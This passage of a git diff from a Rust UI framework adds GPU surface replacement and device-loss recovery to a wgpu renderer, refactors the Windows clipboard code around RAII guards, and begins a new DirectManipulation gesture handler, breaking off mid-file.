2).min(self.max_buffer_size); log::info!("increased instance buffer size to {}", new_capacity); - self.instance_buffer = self.device.create_buffer(&wgpu::BufferDescriptor { + let resources = self.resources_mut(); + resources.instance_buffer = resources.device.create_buffer(&wgpu::BufferDescriptor { label: Some("instance_buffer"), size: new_capacity, usage: wgpu::BufferUsages::STORAGE | wgpu::BufferUsages::COPY_DST, @@ -1403,21 +1647,196 @@ impl WgpuRenderer { if offset + size > self.instance_buffer_capacity { return None; } - self.queue.write_buffer(&self.instance_buffer, offset, data); + let resources = self.resources(); + resources + .queue + .write_buffer(&resources.instance_buffer, offset, data); *instance_offset = offset + size; Some((offset, NonZeroU64::new(size).expect("size is at least 16"))) } fn instance_binding(&self, offset: u64, size: NonZeroU64) -> wgpu::BindingResource<'_> { wgpu::BindingResource::Buffer(wgpu::BufferBinding { - buffer: &self.instance_buffer, + buffer: &self.resources().instance_buffer, offset, size: Some(size), }) } + /// Mark the surface as unconfigured so rendering is skipped until a new + /// surface is provided via [`replace_surface`](Self::replace_surface). + /// + /// This does **not** drop the renderer — the device, queue, atlas, and + /// pipelines stay alive. Use this when the native window is destroyed + /// (e.g. Android `TerminateWindow`) but you intend to re-create the + /// surface later without losing cached atlas textures. + pub fn unconfigure_surface(&mut self) { + self.surface_configured = false; + // Drop intermediate textures since they reference the old surface size. + if let Some(res) = self.resources.as_mut() { + res.path_intermediate_texture = None; + res.path_intermediate_view = None; + res.path_msaa_texture = None; + res.path_msaa_view = None; + } + } + + /// Replace the wgpu surface with a new one (e.g. after Android destroys + /// and recreates the native window). Keeps the device, queue, atlas, and + /// all pipelines intact so cached `AtlasTextureId`s remain valid. + /// + /// The `instance` **must** be the same [`wgpu::Instance`] that was used to + /// create the adapter and device (i.e. from the [`WgpuContext`]). Using a + /// different instance will cause a "Device does not exist" panic because + /// the wgpu device is bound to its originating instance. + #[cfg(not(target_family = "wasm"))] + pub fn replace_surface( + &mut self, + window: &W, + config: WgpuSurfaceConfig, + instance: &wgpu::Instance, + ) -> anyhow::Result<()> { + let window_handle = window + .window_handle() + .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; + + let surface = create_surface(instance, window_handle.as_raw())?; + + let width = (config.size.width.0 as u32).max(1); + let height = (config.size.height.0 as u32).max(1); + + let alpha_mode = if config.transparent { + self.transparent_alpha_mode + } else { + self.opaque_alpha_mode + }; + + self.surface_config.width = width; + self.surface_config.height = height; + self.surface_config.alpha_mode = alpha_mode; + if let Some(mode) = config.preferred_present_mode { + self.surface_config.present_mode = mode; + } + + { + let res = self + .resources + .as_mut() + .expect("GPU resources not available"); + surface.configure(&res.device, &self.surface_config); + res.surface = surface; + + // Invalidate intermediate textures — they'll be recreated lazily. + res.path_intermediate_texture = None; + res.path_intermediate_view = None; + res.path_msaa_texture = None; + res.path_msaa_view = None; + } + + self.surface_configured = true; + + Ok(()) + } + pub fn destroy(&mut self) { - // wgpu resources are automatically cleaned up when dropped + // Release surface-bound GPU resources eagerly so the underlying native + // window can be destroyed before the renderer itself is dropped. + self.resources.take(); + } + + /// Returns true if the GPU device was lost and recovery is needed. + pub fn device_lost(&self) -> bool { + self.device_lost.load(std::sync::atomic::Ordering::SeqCst) + } + + /// Recovers from a lost GPU device by recreating the renderer with a new context. + /// + /// Call this after detecting `device_lost()` returns true. + /// + /// This method coordinates recovery across multiple windows: + /// - The first window to call this will recreate the shared context + /// - Subsequent windows will adopt the already-recovered context + #[cfg(not(target_family = "wasm"))] + pub fn recover(&mut self, window: &W) -> anyhow::Result<()> + where + W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static, + { + let gpu_context = self.context.as_ref().expect("recover requires gpu_context"); + + // Check if another window already recovered the context + let needs_new_context = gpu_context + .borrow() + .as_ref() + .is_none_or(|ctx| ctx.device_lost()); + + let window_handle = window + .window_handle() + .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; + + let surface = if needs_new_context { + log::warn!("GPU device lost, recreating context..."); + + // Drop old resources to release Arc/Arc and GPU resources + self.resources = None; + *gpu_context.borrow_mut() = None; + + // Wait for GPU driver to stabilize (350ms copied from windows :shrug:) + std::thread::sleep(std::time::Duration::from_millis(350)); + + let instance = WgpuContext::instance(Box::new(window.clone())); + let surface = create_surface(&instance, window_handle.as_raw())?; + let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?; + *gpu_context.borrow_mut() = Some(new_context); + surface + } else { + let ctx_ref = gpu_context.borrow(); + let instance = &ctx_ref.as_ref().unwrap().instance; + create_surface(instance, window_handle.as_raw())? + }; + + let config = WgpuSurfaceConfig { + size: gpui::Size { + width: gpui::DevicePixels(self.surface_config.width as i32), + height: gpui::DevicePixels(self.surface_config.height as i32), + }, + transparent: self.surface_config.alpha_mode != wgpu::CompositeAlphaMode::Opaque, + preferred_present_mode: Some(self.surface_config.present_mode), + }; + let gpu_context = Rc::clone(gpu_context); + let ctx_ref = gpu_context.borrow(); + let context = ctx_ref.as_ref().expect("context should exist"); + + self.resources = None; + self.atlas + .handle_device_lost(Arc::clone(&context.device), Arc::clone(&context.queue)); + + *self = Self::new_internal( + Some(gpu_context.clone()), + context, + surface, + config, + self.compositor_gpu, + self.atlas.clone(), + )?; + + log::info!("GPU recovery complete"); + Ok(()) + } +} + +#[cfg(not(target_family = "wasm"))] +fn create_surface( + instance: &wgpu::Instance, + raw_window_handle: raw_window_handle::RawWindowHandle, +) -> anyhow::Result> { + unsafe { + instance + .create_surface_unsafe(wgpu::SurfaceTargetUnsafe::RawHandle { + // Fall back to the display handle already provided via InstanceDescriptor::display. + raw_display_handle: None, + raw_window_handle, + }) + .map_err(|e| anyhow::anyhow!("{e}")) } } diff --git a/crates/gpui_windows/src/clipboard.rs b/crates/gpui_windows/src/clipboard.rs index c2b8c0ff30c4d9e4c99c9d8c69ffcbf3da19211b..cd0694ab3159984ee7e66f0d71f8c3a6c6ea16b6 100644 --- a/crates/gpui_windows/src/clipboard.rs +++ b/crates/gpui_windows/src/clipboard.rs @@ -8,24 +8,22 @@ use windows::Win32::{ System::{ DataExchange::{ CloseClipboard, CountClipboardFormats, EmptyClipboard, EnumClipboardFormats, - GetClipboardData, GetClipboardFormatNameW, IsClipboardFormatAvailable, OpenClipboard, - RegisterClipboardFormatW, SetClipboardData, + GetClipboardData, GetClipboardFormatNameW, OpenClipboard, RegisterClipboardFormatW, + SetClipboardData, }, Memory::{GMEM_MOVEABLE, GlobalAlloc, GlobalLock, GlobalSize, GlobalUnlock}, Ole::{CF_DIB, CF_HDROP, CF_UNICODETEXT}, }, UI::Shell::{DragQueryFileW, HDROP}, }; -use windows_core::PCWSTR; +use windows::core::{Owned, PCWSTR}; use gpui::{ ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash, }; -// https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-dragqueryfilew const DRAGDROP_GET_FILES_COUNT: u32 = 0xFFFFFFFF; -// Clipboard formats static CLIPBOARD_HASH_FORMAT: LazyLock = LazyLock::new(|| register_clipboard_format(windows::core::w!("GPUI internal text hash"))); static CLIPBOARD_METADATA_FORMAT: LazyLock = @@ -39,47 +37,94 @@ static CLIPBOARD_PNG_FORMAT: LazyLock = static CLIPBOARD_JPG_FORMAT: LazyLock = LazyLock::new(|| register_clipboard_format(windows::core::w!("JFIF"))); -// Helper maps and sets -static FORMATS_MAP: LazyLock> = LazyLock::new(|| { - let mut formats_map = FxHashMap::default(); - formats_map.insert(CF_UNICODETEXT.0 as u32, ClipboardFormatType::Text); - formats_map.insert(*CLIPBOARD_PNG_FORMAT, ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_GIF_FORMAT, ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_JPG_FORMAT, ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_SVG_FORMAT, ClipboardFormatType::Image); - formats_map.insert(CF_DIB.0 as u32, ClipboardFormatType::Image); - formats_map.insert(CF_HDROP.0 as u32, ClipboardFormatType::Files); - formats_map -}); static IMAGE_FORMATS_MAP: LazyLock> = LazyLock::new(|| { - let mut formats_map = FxHashMap::default(); - formats_map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png); - formats_map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif); - formats_map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg); - formats_map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg); - formats_map + let mut map = FxHashMap::default(); + map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png); + map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif); + map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg); + map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg); + map }); -#[derive(Debug, Clone, Copy)] -enum ClipboardFormatType { - Text, - Image, - Files, +fn register_clipboard_format(format: PCWSTR) -> u32 { + let ret = unsafe { RegisterClipboardFormatW(format) }; + if ret == 0 { + panic!( + "Error when registering clipboard format: {}", + std::io::Error::last_os_error() + ); + } + log::debug!( + "Registered clipboard format {} as {}", + unsafe { format.display() }, + ret + ); + ret +} + +fn get_clipboard_data(format: u32) -> Option { + let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0); + LockedGlobal::lock(global) } pub(crate) fn write_to_clipboard(item: ClipboardItem) { - with_clipboard(|| write_to_clipboard_inner(item)); + let Some(_clip) = ClipboardGuard::open() else { + return; + }; + + let result: Result<()> = (|| { + unsafe { EmptyClipboard()? }; + for entry in item.entries() { + match entry { + ClipboardEntry::String(string) => write_string(string)?, + ClipboardEntry::Image(image) => write_image(image)?, + ClipboardEntry::ExternalPaths(_) => {} + } + } + Ok(()) + })(); + + if let Err(e) = result { + log::error!("Failed to write to clipboard: {e}"); + } } pub(crate) fn read_from_clipboard() -> Option { - with_clipboard(|| { - with_best_match_format(|item_format| match format_to_type(item_format) { - ClipboardFormatType::Text => read_string_from_clipboard(), - ClipboardFormatType::Image => read_image_from_clipboard(item_format), - ClipboardFormatType::Files => read_files_from_clipboard(), - }) - }) - .flatten() + let _clip = ClipboardGuard::open()?; + + let mut entries = Vec::new(); + let mut have_text = false; + let mut have_image = false; + let mut have_files = false; + + let count = unsafe { CountClipboardFormats() }; + let mut format = 0; + for _ in 0..count { + format = unsafe { EnumClipboardFormats(format) }; + + if !have_text && format == CF_UNICODETEXT.0 as u32 { + if let Some(entry) = read_string() { + entries.push(entry); + have_text = true; + } + } else if !have_image && is_image_format(format) { + if let Some(entry) = read_image(format) { + entries.push(entry); + have_image = true; + } + } else if !have_files && format == CF_HDROP.0 as u32 { + if let Some(entry) = read_files() { + entries.push(entry); + have_files = true; + } + } + } + + if entries.is_empty() { + log_unsupported_clipboard_formats(); + return None; + } + Some(ClipboardItem { entries }) } pub(crate) fn with_file_names(hdrop: HDROP, mut f: F) @@ -97,359 +142,247 @@ where } match String::from_utf16(&buffer[0..filename_length]) { Ok(file_name) => f(file_name), - Err(e) => { - log::error!("dragged file name is not UTF-16: {}", e) - } + Err(e) => log::error!("dragged file name is not UTF-16: {}", e), } } } -fn with_clipboard(f: F) -> Option -where - F: FnOnce() -> T, -{ - match unsafe { OpenClipboard(None) } { - Ok(()) => { - let result = f(); - if let Err(e) = unsafe { CloseClipboard() } { - log::error!("Failed to close clipboard: {e}",); - } - Some(result) - } - Err(e) => { - log::error!("Failed to open clipboard: {e}",); - None - } +fn set_clipboard_bytes(data: &[T], format: u32) -> Result<()> { + unsafe { + let global = Owned::new(GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?); + let ptr = GlobalLock(*global); + anyhow::ensure!(!ptr.is_null(), "GlobalLock returned null"); + std::ptr::copy_nonoverlapping(data.as_ptr(), ptr as _, data.len()); + GlobalUnlock(*global).ok(); + SetClipboardData(format, Some(HANDLE(global.0)))?; + // SetClipboardData succeeded — the system now owns the memory. + std::mem::forget(global); } + Ok(()) } -fn register_clipboard_format(format: PCWSTR) -> u32 { - let ret = unsafe { RegisterClipboardFormatW(format) }; - if ret == 0 { - panic!( - "Error when registering clipboard format: {}", - std::io::Error::last_os_error() - ); +fn get_clipboard_string(format: u32) -> Option { + let locked = get_clipboard_data(format)?; + let bytes = locked.as_bytes(); + let words_len = bytes.len() / std::mem::size_of::(); + if words_len == 0 { + return Some(String::new()); } - log::debug!( - "Registered clipboard format {} as {}", - unsafe { format.display() }, - ret - ); - ret + let slice = unsafe { std::slice::from_raw_parts(bytes.as_ptr() as *const u16, words_len) }; + let actual_len = slice.iter().position(|&c| c == 0).unwrap_or(words_len); + Some(String::from_utf16_lossy(&slice[..actual_len])) } -#[inline] -fn format_to_type(item_format: u32) -> &'static ClipboardFormatType { - FORMATS_MAP.get(&item_format).unwrap() -} - -// Currently, we only write the first item. -fn write_to_clipboard_inner(item: ClipboardItem) -> Result<()> { - unsafe { - EmptyClipboard()?; - } - match item.entries().first() { - Some(entry) => match entry { - ClipboardEntry::String(string) => { - write_string_to_clipboard(string)?; - } - ClipboardEntry::Image(image) => { - write_image_to_clipboard(image)?; - } - ClipboardEntry::ExternalPaths(_) => {} - }, - None => { - // Writing an empty list of entries just clears the clipboard. - } - } - Ok(()) +fn is_image_format(format: u32) -> bool { + IMAGE_FORMATS_MAP.contains_key(&format) || format == CF_DIB.0 as u32 } -fn write_string_to_clipboard(item: &ClipboardString) -> Result<()> { - let encode_wide = item.text.encode_utf16().chain(Some(0)).collect_vec(); - set_data_to_clipboard(&encode_wide, CF_UNICODETEXT.0 as u32)?; +fn write_string(item: &ClipboardString) -> Result<()> { + let wide: Vec = item.text.encode_utf16().chain(Some(0)).collect_vec(); + set_clipboard_bytes(&wide, CF_UNICODETEXT.0 as u32)?; if let Some(metadata) = item.metadata.as_ref() { - let hash_result = { - let hash = ClipboardString::text_hash(&item.text); - hash.to_ne_bytes() - }; - let encode_wide = - unsafe { std::slice::from_raw_parts(hash_result.as_ptr().cast::(), 4) }; - set_data_to_clipboard(encode_wide, *CLIPBOARD_HASH_FORMAT)?; - - let metadata_wide = metadata.encode_utf16().chain(Some(0)).collect_vec(); - set_data_to_clipboard(&metadata_wide, *CLIPBOARD_METADATA_FORMAT)?; + let hash_bytes = ClipboardString::text_hash(&item.text).to_ne_bytes(); + set_clipboard_bytes(&hash_bytes, *CLIPBOARD_HASH_FORMAT)?; + + let wide: Vec = metadata.encode_utf16().chain(Some(0)).collect_vec(); + set_clipboard_bytes(&wide, *CLIPBOARD_METADATA_FORMAT)?; } Ok(()) } -fn set_data_to_clipboard(data: &[T], format: u32) -> Result<()> { - unsafe { - let global = GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?; - let handle = GlobalLock(global); - std::ptr::copy_nonoverlapping(data.as_ptr(), handle as _, data.len()); - let _ = GlobalUnlock(global); - SetClipboardData(format, Some(HANDLE(global.0)))?; +fn write_image(item: &Image) -> Result<()> { + let native_format = match item.format { + ImageFormat::Svg => Some(*CLIPBOARD_SVG_FORMAT), + ImageFormat::Gif => Some(*CLIPBOARD_GIF_FORMAT), + ImageFormat::Png => Some(*CLIPBOARD_PNG_FORMAT), + ImageFormat::Jpeg => Some(*CLIPBOARD_JPG_FORMAT), + _ => None, + }; + if let Some(format) = native_format { + set_clipboard_bytes(item.bytes(), format)?; } - Ok(()) -} -// Here writing PNG to the clipboard to better support other apps. For more info, please ref to -// the PR. -fn write_image_to_clipboard(item: &Image) -> Result<()> { - match item.format { - ImageFormat::Svg => set_data_to_clipboard(item.bytes(), *CLIPBOARD_SVG_FORMAT)?, - ImageFormat::Gif => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_GIF_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Gif)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - ImageFormat::Png => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_PNG_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Png)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - ImageFormat::Jpeg => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_JPG_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Jpeg)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - other => { - log::warn!( - "Clipboard unsupported image format: {:?}, convert to PNG instead.", - item.format - ); - let png_bytes = convert_image_to_png_format(item.bytes(), other)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; + // Also provide a PNG copy for broad compatibility. + // SVG can't be rasterized by the image crate, so skip it. + if item.format != ImageFormat::Svg && native_format != Some(*CLIPBOARD_PNG_FORMAT) { + if let Some(png_bytes) = convert_to_png(item.bytes(), item.format) { + set_clipboard_bytes(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; } } Ok(()) } -fn convert_image_to_png_format(bytes: &[u8], image_format: ImageFormat) -> Result> { - let image = - image::load_from_memory_with_format(bytes, gpui_image_format_to_image(image_format))?; - let mut output_buf = Vec::new(); - image.write_to( - &mut std::io::Cursor::new(&mut output_buf), - image::ImageFormat::Png, - )?; - Ok(output_buf) -} - -// Here, we enumerate all formats on the clipboard and find the first one that we can process. -// The reason we don't use `GetPriorityClipboardFormat` is that it sometimes returns the -// wrong format. -// For instance, when copying a JPEG image from Microsoft Word, there may be several formats -// on the clipboard: Jpeg, Png, Svg. -// If we use `GetPriorityClipboardFormat`, it will return Svg, which is not what we want. -fn with_best_match_format(f: F) -> Option -where - F: Fn(u32) -> Option, -{ - let mut text = None; - let mut image = None; - let mut files = None; - let count = unsafe { CountClipboardFormats() }; - let mut clipboard_format = 0; - for _ in 0..count { - clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) }; - let Some(item_format) = FORMATS_MAP.get(&clipboard_format) else { - continue; - }; - let bucket = match item_format { - ClipboardFormatType::Text if text.is_none() => &mut text, - ClipboardFormatType::Image if image.is_none() => &mut image, - ClipboardFormatType::Files if files.is_none() => &mut files, - _ => continue, - }; - if let Some(entry) = f(clipboard_format) { - *bucket = Some(entry); - } - } - - if let Some(entry) = [image, files, text].into_iter().flatten().next() { - return Some(ClipboardItem { - entries: vec![entry], - }); - } - - // log the formats that we don't support yet. - { - clipboard_format = 0; - for _ in 0..count { - clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) }; - let mut buffer = [0u16; 64]; - unsafe { GetClipboardFormatNameW(clipboard_format, &mut buffer) }; - let format_name = String::from_utf16_lossy(&buffer); - log::warn!( - "Try to paste with unsupported clipboard format: {}, {}.", - clipboard_format, - format_name - ); - } - } - None +fn convert_to_png(bytes: &[u8], format: ImageFormat) -> Option> { + let img_format = gpui_to_image_format(format)?; + let image = image::load_from_memory_with_format(bytes, img_format) + .map_err(|e| log::warn!("Failed to decode image for PNG conversion: {e}")) + .ok()?; + let mut buf = Vec::new(); + image + .write_to(&mut std::io::Cursor::new(&mut buf), image::ImageFormat::Png) + .map_err(|e| log::warn!("Failed to encode PNG: {e}")) + .ok()?; + Some(buf) } -fn read_string_from_clipboard() -> Option { - let text = with_clipboard_data(CF_UNICODETEXT.0 as u32, |data_ptr, _| { - let pcwstr = PCWSTR(data_ptr as *const u16); - String::from_utf16_lossy(unsafe { pcwstr.as_wide() }) - })?; - let Some(hash) = read_hash_from_clipboard() else { - return Some(ClipboardEntry::String(ClipboardString::new(text))); - }; - let Some(metadata) = read_metadata_from_clipboard() else { - return Some(ClipboardEntry::String(ClipboardString::new(text))); - }; - if hash == ClipboardString::text_hash(&text) { - Some(ClipboardEntry::String(ClipboardString { - text, - metadata: Some(metadata), - })) - } else { - Some(ClipboardEntry::String(ClipboardString::new(text))) - } +fn read_string() -> Option { + let text = get_clipboard_string(CF_UNICODETEXT.0 as u32)?; + let metadata = read_clipboard_metadata(&text); + Some(ClipboardEntry::String(ClipboardString { text, metadata })) } -fn read_hash_from_clipboard() -> Option { - if unsafe { IsClipboardFormatAvailable(*CLIPBOARD_HASH_FORMAT).is_err() } { +fn read_clipboard_metadata(text: &str) -> Option { + let locked = get_clipboard_data(*CLIPBOARD_HASH_FORMAT)?; + let hash_bytes: [u8; 8] = locked.as_bytes().get(..8)?.try_into().ok()?; + let hash = u64::from_ne_bytes(hash_bytes); + if hash != ClipboardString::text_hash(text) { return None; } - with_clipboard_data(*CLIPBOARD_HASH_FORMAT, |data_ptr, size| { - if size < 8 { - return None; - } - let hash_bytes: [u8; 8] = unsafe { - std::slice::from_raw_parts(data_ptr.cast::(), 8) - .try_into() - .ok() - }?; - Some(u64::from_ne_bytes(hash_bytes)) - })? + get_clipboard_string(*CLIPBOARD_METADATA_FORMAT) } -fn read_metadata_from_clipboard() -> Option { - unsafe { IsClipboardFormatAvailable(*CLIPBOARD_METADATA_FORMAT).ok()? }; - with_clipboard_data(*CLIPBOARD_METADATA_FORMAT, |data_ptr, _size| { - let pcwstr = PCWSTR(data_ptr as *const u16); - String::from_utf16_lossy(unsafe { pcwstr.as_wide() }) - }) +fn read_image(format: u32) -> Option { + let locked = get_clipboard_data(format)?; + let (bytes, image_format) = if format == CF_DIB.0 as u32 { + (convert_dib_to_bmp(locked.as_bytes())?, ImageFormat::Bmp) + } else { + let image_format = *IMAGE_FORMATS_MAP.get(&format)?; + (locked.as_bytes().to_vec(), image_format) + }; + let id = hash(&bytes); + Some(ClipboardEntry::Image(Image { + format: image_format, + bytes, + id, + })) } -fn read_image_from_clipboard(format: u32) -> Option { - // Handle CF_DIB format specially - it's raw bitmap data that needs conversion - if format == CF_DIB.0 as u32 { - return read_image_for_type(format, ImageFormat::Bmp, Some(convert_dib_to_bmp)); - } - let image_format = format_number_to_image_format(format)?; - read_image_for_type:: Option>>(format, *image_format, None) +fn read_files() -> Option { + let locked = get_clipboard_data(CF_HDROP.0 as u32)?; + let hdrop = HDROP(locked.ptr as *mut _); + let mut filenames = Vec::new(); + with_file_names(hdrop, |name| filenames.push(std::path::PathBuf::from(name))); + Some(ClipboardEntry::ExternalPaths(ExternalPaths( + filenames.into(), + ))) } -/// Convert DIB data to BMP file format. -/// DIB is essentially BMP without a file header, so we just need to add the 14-byte BITMAPFILEHEADER. -fn convert_dib_to_bmp(dib_data: &[u8]) -> Option> { - if dib_data.len() < 40 { +/// DIB is BMP without the 14-byte BITMAPFILEHEADER. Prepend one. +fn convert_dib_to_bmp(dib: &[u8]) -> Option> { + if dib.len() < 40 { return None; } - let file_size = 14 + dib_data.len() as u32; - // Calculate pixel data offset - let header_size = u32::from_le_bytes(dib_data[0..4].try_into().ok()?); - let bit_count = u16::from_le_bytes(dib_data[14..16].try_into().ok()?); - let compression = u32::from_le_bytes(dib_data[16..20].try_into().ok()?); + let header_size = u32::from_le_bytes(dib[0..4].try_into().ok()?); + let bit_count = u16::from_le_bytes(dib[14..16].try_into().ok()?); + let compression = u32::from_le_bytes(dib[16..20].try_into().ok()?); - // Calculate color table size let color_table_size = if bit_count <= 8 { - let colors_used = u32::from_le_bytes(dib_data[32..36].try_into().ok()?); - let num_colors = if colors_used == 0 { + let colors_used = u32::from_le_bytes(dib[32..36].try_into().ok()?); + (if colors_used == 0 { 1u32 << bit_count } else { colors_used - }; - num_colors * 4 + }) * 4 } else if compression == 3 { 12 // BI_BITFIELDS } else { 0 }; - let pixel_data_offset = 14 + header_size + color_table_size; + let pixel_offset = 14 + header_size + color_table_size; + let file_size = 14 + dib.len() as u32; - // Build BITMAPFILEHEADER (14 bytes) - let mut bmp_data = Vec::with_capacity(file_size as usize); - bmp_data.extend_from_slice(b"BM"); // Signature - bmp_data.extend_from_slice(&file_size.to_le_bytes()); // File size - bmp_data.extend_from_slice(&[0u8; 4]); // Reserved - bmp_data.extend_from_slice(&pixel_data_offset.to_le_bytes()); // Pixel data offset - bmp_data.extend_from_slice(dib_data); // DIB data + let mut bmp = Vec::with_capacity(file_size as usize); + bmp.extend_from_slice(b"BM"); + bmp.extend_from_slice(&file_size.to_le_bytes()); + bmp.extend_from_slice(&[0u8; 4]); // reserved + bmp.extend_from_slice(&pixel_offset.to_le_bytes()); + bmp.extend_from_slice(dib); + Some(bmp) +} - Some(bmp_data) +fn log_unsupported_clipboard_formats() { + let count = unsafe { CountClipboardFormats() }; + let mut format = 0; + for _ in 0..count { + format = unsafe { EnumClipboardFormats(format) }; + let mut buffer = [0u16; 64]; + unsafe { GetClipboardFormatNameW(format, &mut buffer) }; + let format_name = String::from_utf16_lossy(&buffer); + log::warn!( + "Try to paste with unsupported clipboard format: {}, {}.", + format, + format_name + ); + } } -#[inline] -fn format_number_to_image_format(format_number: u32) -> Option<&'static ImageFormat> { - IMAGE_FORMATS_MAP.get(&format_number) +fn gpui_to_image_format(value: ImageFormat) -> Option { + match value { + ImageFormat::Png => Some(image::ImageFormat::Png), + ImageFormat::Jpeg => Some(image::ImageFormat::Jpeg), + ImageFormat::Webp => Some(image::ImageFormat::WebP), + ImageFormat::Gif => Some(image::ImageFormat::Gif), + ImageFormat::Bmp => Some(image::ImageFormat::Bmp), + ImageFormat::Tiff => Some(image::ImageFormat::Tiff), + other => { + log::warn!("No image crate equivalent for format: {other:?}"); + None + } + } } -fn read_image_for_type( - format_number: u32, - format: ImageFormat, - convert: Option, -) -> Option -where - F: FnOnce(&[u8]) -> Option>, -{ - let (bytes, id) = with_clipboard_data(format_number, |data_ptr, size| { - let raw_bytes = unsafe { std::slice::from_raw_parts(data_ptr as *const u8, size) }; - let bytes = match convert { - Some(converter) => converter(raw_bytes)?, - None => raw_bytes.to_vec(), - }; - let id = hash(&bytes); - Some((bytes, id)) - })??; - Some(ClipboardEntry::Image(Image { format, bytes, id })) +struct ClipboardGuard; + +impl ClipboardGuard { + fn open() -> Option { + match unsafe { OpenClipboard(None) } { + Ok(()) => Some(Self), + Err(e) => { + log::error!("Failed to open clipboard: {e}"); + None + } + } + } } -fn read_files_from_clipboard() -> Option { - let filenames = with_clipboard_data(CF_HDROP.0 as u32, |data_ptr, _size| { - let hdrop = HDROP(data_ptr); - let mut filenames = Vec::new(); - with_file_names(hdrop, |file_name| { - filenames.push(std::path::PathBuf::from(file_name)); - }); - filenames - })?; - Some(ClipboardEntry::ExternalPaths(ExternalPaths( - filenames.into(), - ))) +impl Drop for ClipboardGuard { + fn drop(&mut self) { + if let Err(e) = unsafe { CloseClipboard() } { + log::error!("Failed to close clipboard: {e}"); + } + } } -fn with_clipboard_data(format: u32, f: F) -> Option -where - F: FnOnce(*mut std::ffi::c_void, usize) -> R, -{ - let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0); - let size = unsafe { GlobalSize(global) }; - let data_ptr = unsafe { GlobalLock(global) }; - let result = f(data_ptr, size); - unsafe { GlobalUnlock(global).ok() }; - Some(result) +struct LockedGlobal { + global: HGLOBAL, + ptr: *const u8, + size: usize, } -fn gpui_image_format_to_image(value: ImageFormat) -> image::ImageFormat { - match value { - ImageFormat::Png => image::ImageFormat::Png, - ImageFormat::Jpeg => image::ImageFormat::Jpeg, - ImageFormat::Webp => image::ImageFormat::WebP, - ImageFormat::Gif => image::ImageFormat::Gif, - // TODO: ImageFormat::Svg - ImageFormat::Bmp => image::ImageFormat::Bmp, - ImageFormat::Tiff => image::ImageFormat::Tiff, - _ => unreachable!(), +impl LockedGlobal { + fn lock(global: HGLOBAL) -> Option { + let size = unsafe { GlobalSize(global) }; + let ptr = unsafe { GlobalLock(global) }; + if ptr.is_null() { + return None; + } + Some(Self { + global, + ptr: ptr as *const u8, + size, + }) + } + + fn as_bytes(&self) -> &[u8] { + unsafe { std::slice::from_raw_parts(self.ptr, self.size) } + } +} + +impl Drop for LockedGlobal { + fn drop(&mut self) { + unsafe { GlobalUnlock(self.global).ok() }; } } diff --git a/crates/gpui_windows/src/direct_manipulation.rs b/crates/gpui_windows/src/direct_manipulation.rs new file mode 100644 index 0000000000000000000000000000000000000000..08a1e5243e19e1ea6464ceb224754bee93573ea2 --- /dev/null +++ b/crates/gpui_windows/src/direct_manipulation.rs @@ -0,0 +1,359 @@ +use std::cell::{Cell, RefCell}; +use std::rc::Rc; + +use ::util::ResultExt; +use anyhow::Result; +use gpui::*; +use windows::Win32::{ + Foundation::*, + Graphics::{DirectManipulation::*, Gdi::*}, + System::Com::*, + UI::{Input::Pointer::*, WindowsAndMessaging::*}, +}; + +use crate::*; + +/// Default viewport size in pixels. The actual content size doesn't matter +/// because we're using the viewport only for gesture recognition, not for +/// visual output. +const DEFAULT_VIEWPORT_SIZE: i32 = 1000; + +pub(crate) struct DirectManipulationHandler { + manager: IDirectManipulationManager, + update_manager: IDirectManipulationUpdateManager, + viewport: IDirectManipulationViewport, + _handler_cookie: u32, + window: HWND, + scale_factor: Rc>, + pending_events: Rc>>, +} + +impl DirectManipulationHandler { + pub fn new(window: HWND, scale_factor: f32) -> Result { + unsafe { + let manager: IDirectManipulationManager = + CoCreateInstance(&DirectManipulationManager, None, CLSCTX_INPROC_SERVER)?; + + let update_manager: IDirectManipulationUpdateManager = manager.GetUpdateManager()?; + + let viewport: IDirectManipulationViewport = manager.CreateViewport(None, window)?; + + let configuration = DIRECTMANIPULATION_CONFIGURATION_INTERACTION + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_X + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_Y + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_INERTIA + | DIRECTMANIPULATION_CONFIGURATION_RAILS_X + | DIRECTMANIPULATION_CONFIGURATION_RAILS_Y + | DIRECTMANIPULATION_CONFIGURATION_SCALING; + viewport.ActivateConfiguration(configuration)?; + + viewport.SetViewportOptions( + 